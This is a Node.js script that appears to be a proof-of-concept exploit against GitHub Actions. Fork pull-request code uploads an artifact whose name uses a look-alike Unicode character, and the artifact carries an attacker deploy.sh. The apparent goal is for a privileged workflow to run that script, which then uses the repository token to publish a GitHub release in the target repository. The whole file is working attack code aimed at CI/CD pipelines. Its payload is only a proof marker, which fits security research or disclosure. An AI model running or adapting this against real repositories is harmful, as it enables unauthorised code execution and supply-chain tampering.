import {execFileSync} from 'node:child_process'
import {chmodSync, mkdirSync, writeFileSync} from 'node:fs'
import path from 'node:path'
import {fileURLToPath, pathToFileURL} from 'node:url'

const actionDir = path.dirname(fileURLToPath(import.meta.url))
const workspace = process.env.GITHUB_WORKSPACE || process.cwd()
const runId = process.env.GITHUB_RUN_ID

if (!runId) {
  throw new Error('GITHUB_RUN_ID is missing')
}

console.log(`runtime-token-present=${Boolean(process.env.ACTIONS_RUNTIME_TOKEN)}`)
console.log(`results-url-present=${Boolean(process.env.ACTIONS_RESULTS_URL)}`)

const payloadDir = path.join(workspace, 'fork-pr-attacker-codeexec-payload')
mkdirSync(payloadDir, {recursive: true})

const artifactName = `artifact-fork-pr-codeexec-impact-${runId}-deploy-e\u0301`
writeFileSync(path.join(payloadDir, 'padding.bin'), Buffer.alloc(16 * 1024 * 1024, 'F'))

const deployPath = path.join(payloadDir, 'deploy.sh')
writeFileSync(
  deployPath,
  `#!/usr/bin/env bash
set -euo pipefail

mkdir -p publish observations
cat > publish/fork-pr-codeexec-proof.txt <<EOF
source=fork-pr-attacker-deploy-script
method=fork-pr-runtime-action-upload
source-run-id=\${SOURCE_RUN_ID:-}
source-run-url=\${SOURCE_RUN_URL:-}
source-head-repo=\${SOURCE_HEAD_REPO:-}
source-head-branch=\${SOURCE_HEAD_BRANCH:-}
source-head-sha=\${SOURCE_HEAD_SHA:-}
privileged-run-id=\${GITHUB_RUN_ID:-}
repository=\${GITHUB_REPOSITORY:-}
trusted-artifact-name=\${TRUSTED_NAME:-}
attacker-artifact-name=\${ATTACKER_NAME:-}
gh-token-present=$([[ -n "\${GH_TOKEN:-}" ]] && echo true || echo false)
EOF

tag="artifact-fork-pr-codeexec-impact-\${SOURCE_RUN_ID:-${runId}}"
gh release create "$tag" publish/fork-pr-codeexec-proof.txt \\
  --repo "$GITHUB_REPOSITORY" \\
  --target "$GITHUB_SHA" \\
  --title "Fork PR artifact codeexec impact \${SOURCE_RUN_ID:-${runId}}" \\
  --notes "The attached asset was generated by fork PR code selected through the trusted artifact path."
gh release view "$tag" \\
  --repo "$GITHUB_REPOSITORY" \\
  --json url,tagName \\
  --jq '{tagName: .tagName, url: .url}' > observations/fork-pr-codeexec-release.json
`,
  'utf8'
)
chmodSync(deployPath, 0o755)

execFileSync('npm', ['init', '-y'], {
  cwd: actionDir,
  stdio: ['ignore', 'ignore', 'inherit']
})
execFileSync('npm', ['install', '@actions/artifact@6.2.1'], {
  cwd: actionDir,
  stdio: ['ignore', 'ignore', 'inherit']
})

const artifactModule = await import(
  pathToFileURL(path.join(actionDir, 'node_modules/@actions/artifact/lib/internal/client.js'))
)
const {DefaultArtifactClient} = artifactModule

const files = [path.join(payloadDir, 'padding.bin'), deployPath]

const client = new DefaultArtifactClient()
const response = await client.uploadArtifact(
  artifactName,
  files,
  payloadDir,
  {compressionLevel: 0}
)

console.log(JSON.stringify({
  artifactName,
  artifactId: response.id,
  size: response.size,
  digest: response.digest
}))
